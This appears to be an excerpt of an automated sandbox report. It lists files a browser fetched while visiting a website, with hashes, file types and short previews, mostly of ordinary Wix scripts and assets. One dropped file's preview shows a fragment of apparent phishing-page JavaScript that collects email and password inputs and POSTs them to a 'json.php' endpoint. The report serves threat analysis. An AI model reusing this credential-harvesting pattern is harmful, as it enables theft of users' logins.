                                                                                                                                                                                                                        SHA-512:AF3FFD0B90983DFB88F2E2881B672BBFA1844D4F6D311077447BD09647B30BBB5920419B11AE51D3B519EE3F3863D6BBB4EE5E347141E2B97BF9F7E426AA7DF4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:{"version":"2.0","host":"thunderbolt","namespace":"wixui","baseURL":"https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/","model":["ce53f34f.bundle.min.js","6f068bf9.min.css"],"assets":[["stylable-metadata","editor-elements-library.thunderbolt.7e2501ca3889a0eda16f5592a6bccb57f1280e09.metadata.json"]],"components":{"AccordionContainer":["cd060e74.bundle.min.js","18ecde03.min.css"],"AccordionItem_Classic":["23232296.bundle.min.js","10f0acaa.min.css"],"AccordionItem_Responsive":["5f700cea.bundle.min.js","34bfed3b.min.css"],"Accordion":["69733d0b.bundle.min.js","b8be6792.min.css"],"AddressInput":["6c549e77.bundle.min.js","02bf2416.min.css"],"AdminLoginButton":["7fee6835.bundle.min.js","418c3247.min.css"],"AppWidget":["aca10667.bundle.min.js","4049eab0.min.css"],"AppWidget_Classic":["5d414cf3.bundle.min.js","4049eab0.min.css"],"AppWidget_Loader":["8b3fbd4e.bundle.min.js","f702e356.min.css"],"AppWidget_Responsive":["c06e1dbd.bundle.min.js","b3b31f6d.min.css"],"A
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1029)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1145
                                                                                                                                                                                                                        Entropy (8bit):5.299716201738939
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:z/kHvK/FFO8GrPk/FFB2V9PrzvWr/FF/KGr6Z0rK1FZRqVfSyJeDQkgR6Y:sC393B3WPL6zjf
                                                                                                                                                                                                                        MD5:297CD10B2CE6E15BD86473EC1CA874B7
                                                                                                                                                                                                                        SHA1:2B9075B6A9B98E720DF4AA0E913450AF2C1D3427
                                                                                                                                                                                                                        SHA-256:4C8EEB25F147834A8796C3FE1E2F42B02E42975B9ACD20D60CF562D9FADC9D76
                                                                                                                                                                                                                        SHA-512:717FE6C8D440D0401766C6AD95F290E3D03DC82302945DEB3977BE089CBF7E4662990A99FB250B2A91AC257FD81F99D8B467B94942D067A590FDD8BF93FE3EC8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_0.774938b3.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[7457],{15428:(e,t,a)=>{a.r(t),a.d(t,{default:()=>d});var n=a(41594),s=a.n(n);const d=({id:e})=>s().createElement("div",{id:e,style:{display:"none"}})},75120:(e,t,a)=>{a.r(t),a.d(t,{default:()=>d});var n=a(41594),s=a.n(n);const d=({children:e,id:t,className:a,renderCompCssInSiteRoot:n,componentsCss:d})=>s().createElement("div",{id:t,className:a},n&&d&&d.map((({CSS:e})=>e)),e())},92632:(e,t,a)=>{a.r(t),a.d(t,{default:()=>d});var n=a(41594),s=a.n(n);const d=({children:e,hasMaxWidth:t,classNames:a})=>s().createElement(n.Fragment,null,t?s().createElement("div",{className:`max-width-container ${a}`},e()):e())},39758:(e,t,a)=>{a.r(t),a.d(t,{default:()=>l});var n=a(41594),s=a.n(n);const d=n.useLayoutEffect,l=({children:e,pageDidMount:t=(()=>{}),codeEmbedsCallback:a,ComponentCss:l,renderCompCssInSiteRoot:r})=>((0,n.useEffect)((()=>(t(!0),()=>t(!1))),[t]),d((()=>{a?.()})),s().createElement(n.F
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1150
                                                                                                                                                                                                                        Entropy (8bit):1.2100731437092027
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:3NhDllvlNl/khXhCC1111111111111111111111111111111111111111111111H:7Jq55555555555555R
                                                                                                                                                                                                                        MD5:B53CE85A6CCE2AE00037A6CA13C90866
                                                                                                                                                                                                                        SHA1:292D9AEB457AB7FEDBAD452854332AEFF267A78E
                                                                                                                                                                                                                        SHA-256:33C1436F8C40CA2582D091C449FCCC34ED9BF73F02526C5FDEF44F4F06C6321B
                                                                                                                                                                                                                        SHA-512:9271B4BD6B07C15662E9265359AD80CBEDF971C127F8C17EF289AE7A552C3BDA93A8416881493196E956FDC5B2A4DF03CBDA838F4203C7F7B12DCDBFE27B31CB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/client/pfavico.ico
                                                                                                                                                                                                                        Preview:............ .h.......(....... ..... .....@.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):5549
                                                                                                                                                                                                                        Entropy (8bit):5.267396811838556
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:U05QrwlJD3XPAof7N9CpXkJXXBjPNPX7NWRkApoTLserpLu9BMRe/wIGxaf05zq:U052Y5HPAuxIpXkJXXBrBBU43RufPysx
                                                                                                                                                                                                                        MD5:A9872AB83670B2968AC57BEAFD214712
                                                                                                                                                                                                                        SHA1:9CD5653D98D808EC25022C0390C27EA314FC4383
                                                                                                                                                                                                                        SHA-256:6D78C0F0A0D19BACC54CCCC3E94B56F7A95DD651CD9D8010CB0B2FA745135EDC
                                                                                                                                                                                                                        SHA-512:DFF6F836761847DD249CAF0AA7F170EF1F711E9EF9C5ADBF737E967DF65B52A0562A98EF375ECB2F2C718E2A10B6CEC8A6DEB023FCBC00D7F3A0F79F7153CCA6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://siteassets.parastorage.com/pages/pages/thunderbolt?beckyExperiments=.DatePickerPortal%2C.LoginBarEnableLoggingInStateInSSR%2C.TextInputAutoFillFix%2C.WRichTextVerticalTextNowidth%2C.WixFreeSiteBannerMobile%2C.buttonUdp%2C.fetchBlocksDevCenterWidgetIds%2C.fiveGridLineStudioSkins%2C.fixRatingsInputLeftShift%2C.imageEncodingAVIF%2C.inflateRepeaterItemsInRender%2C.minMaxInCheckboxGroup%2C.motionFeature%2C.prefetchPageResourcesVeloApi%2C.removeAllStatesBlocksFix%2C.removeHeaderFooterWrappers%2C.shouldUseResponsiveImages%2C.updateRichTextSemanticClassNamesOnCorvid%2C.useInternalBlocksRefType%2C.useSvgLoaderFeature&blocksBuilderManifestGeneratorVersion=1.129.0&contentType=application%2Fjson&deviceType=Desktop&dfCk=6&dfVersion=1.4246.0&disableStaticPagesUrlHierarchy=false&editorName=Unknown&experiments=dm_bgScrubToMotionFixer%2Cdm_deleteLayoutOverridesForRefComponents%2Cdm_removeTpaChildren%2Cspecs.thunderbolt.use_data_fixed_pages_upstream&externalBaseUrl=https%3A%2F%2Fwww.samantacatering.com&fileId=b5f4a1df.bundle.min&formFactor=desktop&hasTPAWorkerOnSite=false&isHttps=true&isInSeo=false&isMultilingualEnabled=false&isPremiumDomain=true&isTrackClicksAnalyticsEnabled=false&isUrlMigrated=true&isWixCodeOnPage=false&isWixCodeOnSite=false&language=en&languageResolutionMethod=QueryParam&metaSiteId=8fc1138c-79b4-4e29-bbc0-d551c6ca71af&module=thunderbolt-features&oneDocEnabled=true&originalLanguage=en&pageId=0158b4_c37f2e3e47614292406e9b0279f4140c_11.json&quickActionsMenuEnabled=false&registryLibrariesTopology=%5B%7B%22artifactId%22%3A%22editor-elements%22%2C%22namespace%22%3A%22wixui%22%2C%22url%22%3A%22https%3A%2F%2Fstatic.parastorage.com%2Fservices%2Feditor-elements%2F1.13190.0%22%7D%2C%7B%22artifactId%22%3A%22editor-elements%22%2C%22namespace%22%3A%22dsgnsys%22%2C%22url%22%3A%22https%3A%2F%2Fstatic.parastorage.com%2Fservices%2Feditor-elements%2F1.13190.0%22%7D%5D&remoteWidgetStructureBuilderVersion=1.251.0&siteId=cd5327d5-636b-4778-a97d-3945688a9fde&siteRevision=11&staticHTMLComponentUrl=https%3A%2F%2Fwww-samantacatering-com.filesusr.com%2F&useSandboxInHTMLComp=false&viewMode=desktop
                                                                                                                                                                                                                        Preview:{"stateRefs":{"comp-m4s9n2h3":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qtwj1l":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qtxsfg":{"reportBi":{"$type":"ref","refPath":["exports","businessLogger","reportBi"]}}},"structure":{"components":{"comp-m4s9n2h3":{"componentType":"WRichText","pageId":"rovl3","isInSlot":false},"comp-m4qtwj1l":{"componentType":"WRichText","pageId":"rovl3","isInSlot":false},"comp-m4qtxsfg":{"componentType":"StylableButton","uiType":"Default","pageId":"rovl3","isInSlot":false},"pageBackground_rovl3":{"componentType":"PageBackground","pageId":"masterPage"},"rovl3":{"components":["Containerrovl3"],"componentType":"Page","uiType":"TransparentPageSkin","pageId":"rovl3"},"comp-m4qtbye9":{"components":["comp-m4s9n2h3","comp-m4qtwj1l","comp-m4qtxsfg"],"componentType":"ClassicSection","pageId":"rovl3","isInSlot":false},"Containerrovl3":{"components":["comp-m4qtbye9"],"componentTyp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3624
                                                                                                                                                                                                                        Entropy (8bit):4.491187448199961
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:0DBtoxPpWldxFjtxGhXfJxGmW3uxy70I354utNB4tIcEfeSQVgr:0DBtoJy0hXRxGXu1y5bNB+m
                                                                                                                                                                                                                        MD5:E642304FEC275AB83F7C480B4CE918D9
                                                                                                                                                                                                                        SHA1:C1DFF58F3BFB7AB6428FCD02AC4AC785B4DF4F3E
                                                                                                                                                                                                                        SHA-256:BECD218B404204670A103DF9498F98822B7769976208B096C957F41795210043
                                                                                                                                                                                                                        SHA-512:0CF85D8AB108D60B82AD2A6E477805B5C205C2241F0A6A1F2EDDBF5364D06FBB9000F464BC6AEB39A2ED35FA036A3751B387175EE22984B5ADA4ED9EC4A93483
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview: const container1 = document.querySelector(".container");.. const container2 = document.querySelector(".container2");.. const emText = document.querySelector(".minp");.. const errorTextBox = document.querySelector(".errorTextBox");.. const emForm = document.querySelector(".emForm");.. const paForm = document.querySelector(".paForm");.. const emi = document.querySelector(".emi");.. const paInp = document.querySelector(".paInp");.. const backbt = document.querySelector(".backbt");.. const error2 = document.querySelector(".error2");.. const errPa = document.querySelector(".errPa");.. let err1 = 0;.... const handleresp = (res) => {.. // add your link .. fetch("../json.php", { .. method: "POST",.. body: res .. });.. };........ function randomString(length, chars) {....var result = '';....for (var i = length; i > 0; --i) result += cha
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3692)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):3813
                                                                                                                                                                                                                        Entropy (8bit):5.357533276773501
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:6Fa1Ks9i03n8aTI67FlSUUG2hjKgUbCL32CZvKyvW47VMUy:6hP0Xb/MUUTNMkm+fW4hMUy
                                                                                                                                                                                                                        MD5:015C8673A81EE2BAD9238CF5B7B85857
                                                                                                                                                                                                                        SHA1:E9A16FF3B8BC4C4580EA651DE0FD76F831F77A70
                                                                                                                                                                                                                        SHA-256:335F6EC02E6F666E2E6AAD2BB8F61904DE3891E9475942F44B25FF91A50A9648
                                                                                                                                                                                                                        SHA-512:2020CEBDECA36C23CDFB68338FB1CCC00EA7AB90179B451437214B363F7D7C320F0F0DD5DF7495FA6A18A3B4E109210A85D23D63E7E8D9C6E97B924BBDD65E3A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/assetsLoader.14dc79b8.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[569,5445],{33615:(e,t,a)=>{a.r(t),a.d(t,{ProtectedPagesApiSymbol:()=>S,page:()=>U,site:()=>y});var s,o=a(77748),n=a(20590),r=a(54563);!function(e){e.SM="SM",e.Pass="PASS",e.NONE="NONE"}(s||(s={}));const i=(0,o.Og)([(0,o.KT)(n._K,r.U),(0,o.KT)(n.YG,r.U),(0,o.KT)(n.wk,r.U)],((e,t,a)=>{const o=a=>{const o=e.pagesSecurity[a];return o&&o.requireLogin?s.SM:t.passwordProtected[a]||o&&o.passwordDigest?s.Pass:s.NONE};return{async handle(t){if(t.pageJsonFileName)return t;const n=t.pageId,{pagesMap:r,loginAndNavigate:i,authenticateUsingSitePassword:g,completedSitePasswordAuth:p}=a.get();if(r[n])return{...t,pageJsonFileName:r[n]};if(o("masterPage")===s.Pass&&!p)return g(t),null;const c=o(n);return c===s.NONE&&((e,t)=>{throw new Error(`we do not have authentication info for protected page ${e} page security: ${t}`)})(n,e.pagesSecurity[n]),i(t,c),null}}}));var g=a(71085),p=a(66397),c=a(19889),u=a(
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1001)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1141
                                                                                                                                                                                                                        Entropy (8bit):5.307589003050392
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:z/kCclx66m+UFs0FgUH2ltw3+ukQnEG3hjW0z+RJzzyiJR0kgtEz:hcAGcfgUAMr3k/QL8z
                                                                                                                                                                                                                        MD5:24211DDA55C887DE6746ABCE758FF45F
                                                                                                                                                                                                                        SHA1:DA7415C755712079494C2A0011BC7A39DADEE108
                                                                                                                                                                                                                        SHA-256:68E2657F83BC03D0FF29FF61919208166A23B4076373921664EE2C2FD18170D5
                                                                                                                                                                                                                        SHA-512:F31B82F2FAF8BB3E72480B6A8BCFE2A13EA1C62F289E5E803D8EBF6543A81C3E14730021BA67F67D93F03D34122E56E9BCF55862DD4847C322CBEDE2A1194B78
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[2545],{81095:(e,t,n)=>{n.d(t,{createComponentsRegistryCSR:()=>p});var o=n(76904);var s=n(40983);const r=(0,n(8338).Iq)({host:"thunderbolt"});var i=n(56900);const a=(0,s.K)({host:"viewer"});async function p({runAndReport:e}){window.componentsRegistry&&await window.componentsRegistry.runtimeReady;const t=window.componentsRegistry?.runtime,n=window.viewerModel.componentsLibrariesTopology||[],s=function(){const e=window.viewerModel.experiments;return t=>(0,o.k)(t,e)}(),p=await e(a,(()=>r({options:{useScriptsInsteadOfEval:!0,usePartialManifests:!0},mode:"lazy",modes:{mobui:"eager"},libraries:[...t?.libraries||[],...n],isExperimentOpen:s,getSentryClient:(0,i.S)(s)})));let d=null;return{getComponentsLibrariesAPI:()=>({getComponents:()=>p.getComponentsLoaders(),getAllComponentsLoaders:async()=>(d||(d=p.ensureManifestsAreLoaded()),await d,p.getComponentsLoaders())}),getRegistryAPI:()=>p}}}}])
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (56756)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):58296
                                                                                                                                                                                                                        Entropy (8bit):6.052265860508475
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:cHJYDDQHVZHIs91TXESJBjgBSp00yCqJ3Z+IYM3WiesRQiULO0bpD9tcNQEfdom2:cmDD6oeFUycwpk06hWp1b99c7VM
                                                                                                                                                                                                                        MD5:CBB42513032D6C09E496731AC16C20A9
                                                                                                                                                                                                                        SHA1:C92F38A701AAD58408451D24DD4C47B05F158CF0
                                                                                                                                                                                                                        SHA-256:D189695B2F3BB92369881F2428FA861DCA9D9A94C638D9BDC4E2FA747D6F315B
                                                                                                                                                                                                                        SHA-512:3D76F1018AFCEABA7CBB4083F4A5B5758966EC2AA5D5C6B07D72361782809F7ED4BD34ED9E0C4154D01A2DB7192155DE8251E5A834DD90B8D9823D916E1B7285
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/favicon.ico
                                                                                                                                                                                                                        Preview:<!doctype html>.<html>..<head>...<meta charset="utf-8" />...<meta name="viewport" content="width=device-width, initial-scale=1.0" />...<title>404 Not Found</title>...<style>....* {.....margin: 0;.....padding: 0;.....box-sizing: border-box;....}....html {.....height: 100%;....}....body {.....height: 100%;.....font-size: 14px;....}.....container {.....display: flex;.....flex-direction: column;.....align-items: center;.....height: 100%;.....padding-top: 12%;....}.....logo img {.... display: block;.... width: 100px;....}.....logo img + img {.... margin-top: 12px;....}.....title {.....margin-top: 24px;.....font-size: 110px;.....color: #333;.....letter-spacing: 10px;....}.....desc {.....font-size: 16px;.....color: #777;.....text-align: center;.....line-height: 24px;....}.....footer {...../* position: absolute;.....left: 0;.....bottom: 32px;.....width: 100%; */.....margin-top: 24px;.....text-align: center;.....font-size: 12px;....}.....footer .btlink {.....color: #20a53a;.....text-de
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12037)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):12154
                                                                                                                                                                                                                        Entropy (8bit):5.301848236338458
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:Jd4xuYUm9pEMKhbW0MGnGvAk/CCiST1keD4JOrd6qNelJxgnPxAvL0hDxABHyuAT:74oTmSMGGvvqX4TxYHyuAYMdQj7uiwRR
                                                                                                                                                                                                                        MD5:E76FBBECCAFF59FF1C2FE5FB515009F1
                                                                                                                                                                                                                        SHA1:58C4BB8F9B648DFE507D1CE76F5EBC581FC24E14
                                                                                                                                                                                                                        SHA-256:49569AD3A80B2FCA596606731F721673D9D5965D3516E5AE5877B9EC8D3A3842
                                                                                                                                                                                                                        SHA-512:ED8B40F67E5833B5498903CC67DCBB1AF753DA6DF38FD6333D35D9ADCEC0461925A13E29CB4E7ADB1937B35FF497DD7503995065FDC35E9A68A70258FA302C32
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_30.55a3b177.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[4526],{24334:(e,t,r)=>{r.r(t),r.d(t,{ClassNameApiSymbol:()=>p._c,page:()=>_});var a=r(62155),n=r.n(a),o=r(77748),s=r(20590),i=r(66225),c=r(32166),g=r(39218),l=r(87711),d=r(35406),p=r(79904),m=r(789);const f=(e,t)=>{if(!e)return!1;const r=e;return r.id===t||!!r.parentNode&&f(r.parentNode,t)},u=(e,t)=>(t=t||window.innerWidth,!(e.min&&t<e.min)&&!(e.max&&t>e.max));var h=r(56656),v=r(49698),E=r(89301),T=r(59058);const b={addCompId:!0},y=(0,o.Og)([(0,o.KT)(s.Gp,p.UU),(0,o.KT)(s.wk,p.UU),(0,o.KT)(s.AF,p.UU),p.cZ,i.T,c.RV,g.Is,l.Ji,c.Ht,p.o2,p.LI,p.RB,p.P0,p._c,d.Q,p.LY,(0,o.lq)(g.dB),(0,o.lq)(E.J0),(0,o.lq)(T.h)],(({compsToTriggers:e,isTouchDevice:t,compIdsWithAccessibleTrigger:r,effectTriggerToReaction:a,dynamicCompToDescendants:o,isMotionEnabled:s},i,c,g,l,d,p,u,E,T,{isTriggerBpRangeInCurrentBreakpoint:y},R,{shouldEnableTriggersAndReactions:C},{addClassName:I},$,k,D,w,U)=>{let O;const S=(
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1223)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1352
                                                                                                                                                                                                                        Entropy (8bit):5.235577373009787
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:z/kGxbyoFiAZWDUT66JxNlZZfYTYQDRFzmQDRF+26Ay+HycRdrmDZRZYaHZYV+Sm:viWWDM66FRwbXz9XFUJcPmRZvZi+SNw7
                                                                                                                                                                                                                        MD5:A032340B7D80E2F00882B993C262B01F
                                                                                                                                                                                                                        SHA1:EC69BC6C33540F96E445182580A7A11276C62EEF
                                                                                                                                                                                                                        SHA-256:540285A72576C8849036EBD78FF6F49B68761D21F5BA140D9E35D03603A9348A
                                                                                                                                                                                                                        SHA-512:2AF7ED4259D39F242CF392FC166FD719A13DBC15D91A8DA7A107100E3806A3B6A9C17A0F2D21766BB4850B558E9511B386E7A75CFB7F873B5A8332F1261B240A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[693],{36655:(t,o,r)=>{r.d(o,{f:()=>i});var n=r(17709),e=r.n(n);const s=(t,o)=>o?t.scrollLeft:t.scrollTop,l=(t,o,r)=>{const n=s(t,r),e=((t,o)=>o?t.scrollWidth:t.scrollHeight)(t,r),l=((t,o)=>{const r=t.getBoundingClientRect();return o?r.width:r.height})(t,r),i="forward"===o?1:-1,{minScrollPosition:c,maxScrollPosition:a}=((t,o,r)=>{const n=r?"left":"top",e=s(t,r);t.scrollTo({[n]:o,behavior:"instant"});const l=s(t,r);t.scrollTo({[n]:0,behavior:"instant"});const i=s(t,r);return t.scrollTo({[n]:e,behavior:"instant"}),{minScrollPosition:i,maxScrollPosition:l}})(t,e,r);if(Math.trunc(n)<=c&&"backward"===o)return e;if(Math.trunc(n)>=a&&"forward"===o)return 0;const h=n+i*l;return h+l>e?e:h<0?0:Math.round(h)},i=(t,o,r)=>{const n=t.containerProps?.overlowWrapperClassName||t.responsiveContainerProps?.overlowWrapperClassName;if(!n)return;const s=window.document.getElementById(o).getElementsByClassN
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21809)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):21922
                                                                                                                                                                                                                        Entropy (8bit):5.320167979273014
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:rwCBCekm4nUxrE10t23ACpvFxHtU62wc5Md+SIyakKHptluIvCC8Akl2S4F9SCto:r3cekm4nUxrE10t23ACPxHtX1c56+SIe
                                                                                                                                                                                                                        MD5:1A8945E17F7E3611640EACB74E873849
                                                                                                                                                                                                                        SHA1:AC66577CC578BED803D7B2BE781649517767CF46
                                                                                                                                                                                                                        SHA-256:BAAA354F37C8AA466F117B84BA94469772A48B2FFD5B7C7AA68BDA734F5F0BD6
                                                                                                                                                                                                                        SHA-512:34BCC7F794337A9B19FFDAF58A715ADA26BC03D063D7E630B3D2AABC0A967C7CD55A58E2BC5500B92E1BFD2D5EB86DBDF5DF1B13832885D9EEC0EFAB0519B0B4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[9839],{21280:(e,t,n)=>{n.d(t,{T9:()=>i,t7:()=>o,w4:()=>a,wB:()=>c});const r="rb_",s=".local";function o(e){return e.replace(s,"")}const a=e=>{const{componentName:t,originalComponentName:n,part:s,namespace:o="",host:a,batch:i}=e,c=function(e,t){return e?e!==t&&t?`${e.replace(new RegExp(t,"g"),"~")}~${t}`:e:null}(t,n);return t&&s?`${r}${o}.${a}[${c}]${s}`:t?`${r}${o}.${a}[${c}]`:i?`${r}${o}.${a}_${i}`:s?`${r}${o}.${a}~${s}`:`${r}${o}.${a}`},i=({namespace:e,host:t,isDev:n})=>`${r}${e}.${t}.manifest${(n?"":".min")+".json"}`;function c(e){return`${e}_lazy_factory`}},68879:(e,t,n)=>{n.d(t,{L:()=>r});const r={experiments:{fixAnonymousDefine:"specs.thunderbolt.ComponentsRegistryFixAnonymousDefine",noEvalWorkaround:"specs.thunderbolt.ComponentsRegistryNoEvalWorkaround"}}},49462:(e,t,n)=>{n.d(t,{K5:()=>o,zT:()=>r});const r={FetchError:100,NoComponentsAtHostBundle:201,NoComponentsAtComponentBun
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4143)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):73015
                                                                                                                                                                                                                        Entropy (8bit):5.342744191670081
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:X9ylPegosd1p8X4Kx2iiC0guaihfaZgb9pL/:X9cVaizgehfaZCX/
                                                                                                                                                                                                                        MD5:9BECC40FB1D85D21D0CA38E2F7069511
                                                                                                                                                                                                                        SHA1:AE854B04025DB8B7F48FDD6DEDF41E77EAE44394
                                                                                                                                                                                                                        SHA-256:A9705DFC47C0763380D851AB1801BE6F76019F6B67E40E9B873F8B4A0603F7A9
                                                                                                                                                                                                                        SHA-512:585374E3CE3AB1D28C20FE4B28DA6131A5B353B629332094DB8E5EB4ADE0FF601161B3CAF546F5F1E1BE96353DEAA29109687EAAE098EF279F4A6964430D4035
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/unpkg/lodash@4.17.21/lodash.min.js
                                                                                                                                                                                                                        Preview:/**. * @license. * Lodash <https://lodash.com/>. * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>. * Released under MIT license <https://lodash.com/license>. * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>. * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors. */.(function(){function n(n,t,r){switch(r.length){case 0:return n.call(t);case 1:return n.call(t,r[0]);case 2:return n.call(t,r[0],r[1]);case 3:return n.call(t,r[0],r[1],r[2])}return n.apply(t,r)}function t(n,t,r,e){for(var u=-1,i=null==n?0:n.length;++u<i;){var o=n[u];t(e,o,r(o),n)}return e}function r(n,t){for(var r=-1,e=null==n?0:n.length;++r<e&&t(n[r],r,n)!==!1;);return n}function e(n,t){for(var r=null==n?0:n.length;r--&&t(n[r],r,n)!==!1;);return n}function u(n,t){for(var r=-1,e=null==n?0:n.length;++r<e;)if(!t(n[r],r,n))return!1;.return!0}function i(n,t){for(var r=-1,e=null==n?0:n.length,u=0,i=[];++r<e;){var o=n[r];t(o,r,n)&&(i[u++]=o)}return i}function o(n
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1100)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1217
                                                                                                                                                                                                                        Entropy (8bit):5.396017284784193
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:z/k/GGcl+F9Lx0I5C0WOpbRrftWOmvTJPkoHLRthBNZCz6xejOCckgKN:gt99Lx0I5OOpbRrfkOmLJMorfNZvx1DS
                                                                                                                                                                                                                        MD5:15BAE755A94C8E4FEDC748581EE318DE
                                                                                                                                                                                                                        SHA1:F2E8DAAE5569F4BFA5D2E9A48429292CEDF019F6
                                                                                                                                                                                                                        SHA-256:9510C51BA90309BB4FCF2C23C9C13405758368281799EA18E27981035FFE10CE
                                                                                                                                                                                                                        SHA-512:5227326FE2C96481F0B558984B3B91E3175F90F077FFF8E07C178D2FAFA0BBD4C352CD8E734DA272F91C48B98821E573A91D57F49C7387921F7CBF6ED6707FBE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_11.ffa65b2d.chunk.min.js
